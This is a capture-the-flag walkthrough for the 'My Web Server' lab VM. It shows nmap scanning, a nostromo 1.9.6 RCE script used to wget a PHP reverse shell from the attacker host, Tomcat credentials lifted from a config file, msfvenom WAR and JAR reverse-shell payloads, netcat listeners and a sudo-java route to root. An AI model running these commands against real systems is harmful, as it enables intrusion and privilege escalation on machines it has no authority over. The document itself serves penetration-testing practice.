MY WEB SERVER:1 walkthrough

DESCRIPTION

Welcome to “My Web Server”

This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerablities of target.

Goal: Get the root flag of the target.

Difficulty: Medium/Intermediate Level

Need hints? Twitter @akankshavermasv

DHCP is enabled

Your feedback is really valuable for me! Twitter @akankshavermasv

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good Luck..!!!

This works better with VirtualBox rather than VMware.

HOST-DISCOVERY

# nmap -v 192.168.56.1/24

NMAP SCAN

#nmap -v -sV -sC -O -A -p- -oN nmap.txt 192.168.56.148

ENUMRATION

After enumrating various services on machine i found nostromo 1.9.6 vunreable to RCE.

On further enumration i got an bash script.

./exploit.sh 192.168.56.148 2222 id

GET A SHELL

/tem dir is writeable and wget service is also accessible.

So i enabled my python server on 8080 port and transfered my php shell file to target machine.

# ./exploit.sh 192.168.56.148 2222 cd /tmp/; wget http://192.168.56.1:8080/shell.php

This succesfully transfers our reverse shell on traget machine. Now we just have to execute our php file and we get shell.

I just turn on my reverse shell listener.

getting a shell

#./exploit.sh 192.168.56.149 2222 “php /tmp/shell.php”

UPGRADING TO TTY SHELL

#python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

#Ctrl-Z

#stty raw -echo

#fg

#reset

#export SHELL=bash

#export TERM=xterm-256color

PRIVILEGES ESCLATION

After some enumration i got an sudoer file.

#cat /etc/sudoers.d/mysudo

We can run java as root by tomcat user without password.

After going through passwd file, we cannot switch to tomcat user by password.

Finding the world readables, i got a tomcat writeable file.

#cat /usr/local/tomcat/conf/tomcat-users.xml

Their is a tomcat service running on port 8080

logining with id and password

tomcat:@sprot0230sp

upload a reverse shell in .WAR file.

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=4455-f war > shell.war

After uploading the shell file we can see it in application manager.

#nc -lvp 4455

upgrade to tty shell.

#sudo -l

#msfvenom — platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=7777 -o payload.jar

starting python server and transfering payload.

Now, /opt/tomcat directory is writeable.

#wget http://192.168.56.1:8080/payload.jar

Now running this exploit as root and starting listener on port 7777.

#

PROOF

Certified Ethical Hacker